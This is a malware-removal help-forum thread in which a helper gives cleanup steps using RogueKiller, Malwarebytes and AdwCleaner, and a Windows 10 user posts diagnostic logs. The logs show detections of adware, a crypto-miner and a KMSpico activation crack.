Task: {EB684CE2-5E4F-4692-B7BC-796F32D5014C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-02-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {FC33DBE7-C910-4F1C-B383-007FD7E6ABC7} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
2019-02-08 21:46 - 2019-02-07 20:09 - 003780096 _____ () C:\ProgramData\Logic Cramble\set.exe
2015-09-10 13:08 - 2015-09-10 13:08 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 002498808 _____ () C:\Windows\system32\CoreUIComponents.dll
2015-07-10 11:19 - 2015-07-10 11:19 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-07-10 11:13 - 2015-09-10 13:08 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 11:13 - 2015-09-10 13:08 - 000210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2019-02-08 21:47 - 2017-12-12 11:35 - 000281600 _____ () C:\Program Files (x86)\Multitimer\Multitimer.exe
2019-02-08 23:02 - 2019-02-06 10:00 - 002684400 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\swiftshader\libglesv2.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 000156656 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\swiftshader\libegl.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libglesv2.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libegl.dll
2019-02-09 00:44 - 2019-02-09 00:44 - 001083392 _____ () C:\Users\Thomazing!\AppData\Local\Temp\is-UBPC7.tmp\i2z4dmklduc.tmp
2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ () C:\Windows\bxetfbicyncsflqei.bxetf
2019-02-09 00:44 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Thomazing!\AppData\Local\Temp\is-0ODST.tmp\itdownload.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-31 06:42 - 2019-02-08 21:46 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{34014409-F047-4511-8A51-E0086652B848}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{EE26B7B5-4F57-4DB5-8AAD-A1A7AEEA5CF8}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{2F9DA978-66F3-44BD-BE3B-F5490BFA7C57}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{11A88E17-3A04-4D89-B347-E025C0716D1A}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [{76CDF517-F312-44A8-B7D6-E74702BA4382}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{3F615D37-89C0-45E6-842F-5EB82ECD2C76}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D3020994-C154-42F4-93AA-C0B3C54504AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{1DE617D9-CAAF-4865-88CC-8B52F2C6CE8C}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{47792053-3338-4A6F-AE9E-447B51B4287A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0A843646-B083-4688-8D3B-A42EB241BEAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9A85637C-ABF5-4BC7-8DBF-AEAC9B50890A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4F5E25DC-8146-46D7-B3C7-DAEBA3A90326}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2B39C486-2C5E-45FF-B698-F6C65CB96345}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{456C25A6-8A05-4EC5-B99F-03BA6956BF72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{92C0DFAF-0F89-4F63-A042-BBB6C7AEAE3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D453C330-AB73-4D2F-AEDC-5ACC2FECD2EF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{76C2B05D-59C7-4F00-A6FA-E3B3EC26DF57}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{A5393F9A-F08B-4AF7-8E8A-5552C87EB8A1}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6A332DC7-031B-46F5-8EE9-4BC596EEC559}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
==================== Restore Points =========================
ATTENTION: System Restore is disabled
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (02/09/2019 12:44:21 AM) (Source: MsiInstaller) (EventID: 11327) (User: DESKTOP-OHFLJFD)
Description: Продукт: Microsoft.NET -- Ошибка 1327. Недопустимое устройство: G:\
Error: (02/09/2019 12:42:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 12:38:44 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Multitimer.exe version 1.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 10e0
Start Time: 01d4bfcbbc5e5969
Termination Time: 4294967295
Application Path: C:\Program Files (x86)\Multitimer\Multitimer.exe
Report Id: f84380ae-2bbf-11e9-8d72-0026b664e783
Faulting package full name:
Faulting package-relative application ID:
Error: (02/08/2019 11:15:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Multitimer.exe version 1.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 17e4
Start Time: 01d4bfbec9052d5e
Termination Time: 4294967295
Application Path: C:\Program Files (x86)\Multitimer\Multitimer.exe
Report Id: 5e394fbf-2bb4-11e9-8d71-0026b664e783
Faulting package full name:
Faulting package-relative application ID:
Error: (02/08/2019 11:15:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/08/2019 11:15:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.10240.16425, time stamp: 0x55bec5f5
Faulting module name: CoreUIComponents.dll, version: 0.0.0.0, time stamp: 0x55d2cdf8
Exception code: 0xc0000005
Fault offset: 0x0000000000061f8e
Faulting process id: 0x13e8
Faulting application start time: 0x01d4bfbf1ac83bd3
Faulting application path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Faulting module path: C:\Windows\system32\CoreUIComponents.dll
Report Id: 8f9dc01a-6d94-4173-94ac-714bb15ffaf6
Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App
System errors:
=============
Error: (02/09/2019 12:42:30 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
Description: The server CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca did not register with DCOM within the required timeout.
Error: (02/09/2019 12:42:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 12:31:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Installer service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
Error: (02/09/2019 12:29:33 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_Session1 service to connect.
Error: (02/09/2019 12:29:23 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/08/2019 11:05:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NmU2M2EwMWU service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 5000 milliseconds: Restart the service.
Windows Defender:
===================================
Date: 2019-02-08 22:58:52.037
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:28:36.285
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:22:31.668
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:08:55.987
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:00:18.323
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd;file:_D:\Thomas' Backup (1-22-16)\Thomas Entena\Documents\Set-Up\windows 10\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Program Files\WinRAR\WinRAR.exe
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
==================== Memory info ===========================
Processor: Pentium(R) Dual-Core CPU T4400 @ 2.20GHz
Percentage of memory in use: 35%
Total physical RAM: 8059.98 MB
Available physical RAM: 5186.63 MB
Total Virtual: 9979.98 MB
Available Virtual: 6556.94 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:97.66 GB) (Free:80.22 GB) NTFS
Drive e: (Abebi) (Fixed) (Total:125.81 GB) (Free:21.43 GB) NTFS
\\?\Volume{134fa4c9-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 134FA4C9)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=125.8 GB) - (Type=0F Extended)
==================== End of Addition.txt ============================
-
February 8th, 2019, 05:04 PM
#3
Please, observe following rules:
- Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
- If you're stuck, or you're not sure about certain step, always ask before doing anything else.
- Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
- Never run more than one scan at a time.
- Keep updating me regarding your computer behavior, good, or bad.
- The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
- If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
- I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
================================
Uninstall following unwanted programs:
CloudNet
DiskWMpower
Multitimer
Download RogueKiller from one of the following links and save it to your Desktop:
Link 1
Link 2
- Close all the running programs
- Double click on downloaded setup.exe file to install the program.
- Click on Start Scan button.
- Click on another Start Scan button.
- Wait until the Status box shows Scan Finished
- Click on Remove Selected.
- Wait until the Status box shows Deleting Finished.
- Click on Report and copy/paste the content of the Notepad into your next reply.
- RKreport.txt could also be found on your desktop.
- If more than one log is produced post all logs.
Please download Malwarebytes to your desktop.
- Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
- Then click Finish.
- Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
- If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
- When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
- Restart your computer when prompted to do so.
- The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.
Please download AdwCleaner by Xplode and save to your Desktop.
- Double click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8/10 users right-click and select Run As Administrator - The tool will start to update the database if one is required.
- Click on the Scan button.
- AdwCleaner will begin...be patient as the scan may take some time to complete.
- After the scan has finished, click on the Logfile button.
- A window will open which lists the logs of your scans.
- Click on the Scan tab.
- Double-click the most recent scan which will be at the top of the list....the log will appear.
- Review the results...see note below
- After reviewing the log, click on the Clean button.
- Press OK when asked to close all programs and follow the onscreen prompts.
- Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
- After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
- To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
- Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
- A copy of all logfiles are saved to C:\AdwCleaner.
-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.
-
February 9th, 2019, 12:53 AM
#4
Here:
Rougekiller REPORT 1:
RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 10 (10.0.10240) 64 bits
Started in : Normal mode
User : Thomazing! [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190204_072850, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/02/09 08:00:39 (Duration : 00:12:46)
Switches : -refid 3
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Winmon (Malicious)] (file) WinmonProcessMonitor.sys -- C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
RougeKiller REPORT 2:
RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 10 (10.0.10240) 64 bits
Started in : Normal mode
User : Thomazing! [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190204_072850, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/02/09 08:00:39 (Duration : 00:12:46)
Switches : -refid 3
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Winmon (Malicious)] (file) WinmonProcessMonitor.sys -- C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
-
February 9th, 2019, 12:54 AM
#5
Malwarebytes
www.malwarebytes.com
-Log Details-
Scan Date: 2/9/19
Scan Time: 12:07 PM
Log File: 2ea0ec9e-2c20-11e9-a4d9-0026b664e783.json
-Software Information-
Version: 3.7.1.2839
Components Version: 1.0.538
Update Package Version: 1.0.9182
License: Trial
-System Information-
OS: Windows 10 (Build 10240.16487)
CPU: x64
File System: NTFS
User: DESKTOP-OHFLJFD\Thomazing!
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 255377
Threats Detected: 264
Threats Quarantined: 256
Time Elapsed: 14 min, 31 sec
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
-Scan Details-
Process: 2
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182
Module: 2
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182
Registry Key: 41
PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, Quarantined, [6124], [448845],1.0.9182
PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{43DBA25B-CE5F-49A9-898C-47539A2F79EE}, Quarantined, [6124], [448845],1.0.9182
PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{43DBA25B-CE5F-49A9-898C-47539A2F79EE}, Quarantined, [6124], [448845],1.0.9182
RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CloudNet, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{44244107-8600-4170-9FE9-B04F411A8CD2}, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5255E603-D784-4BD0-89A8-EE3FBB6E0334}, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{5255E603-D784-4BD0-89A8-EE3FBB6E0334}, Quarantined, [732], [512160],1.0.9182
RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\EpicNet Inc., Quarantined, [732], [451809],1.0.9182
Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\EWMON, Quarantined, [2805], [411133],1.0.9182
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}, Quarantined, [797], [259987],1.0.9182
Adware.Wajam, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Quarantined, [494], [-1],0.0.0
Trojan.Agent, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Amazon assistant 1.0, Quarantined, [416], [533745],1.0.9182
Trojan.Agent, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Amazon assistant 2.0, Quarantined, [416], [533745],1.0.9182
Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Ebayssistant 1.0, Quarantined, [3714], [623237],1.0.9182
Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Look Picture Tool, Quarantined, [3714], [623238],1.0.9182
Trojan.Agent.E, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\telezilla, Quarantined, [3714], [623239],1.0.9182
PUP.Optional.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\wewewe, Quarantined, [688], [339689],1.0.9182
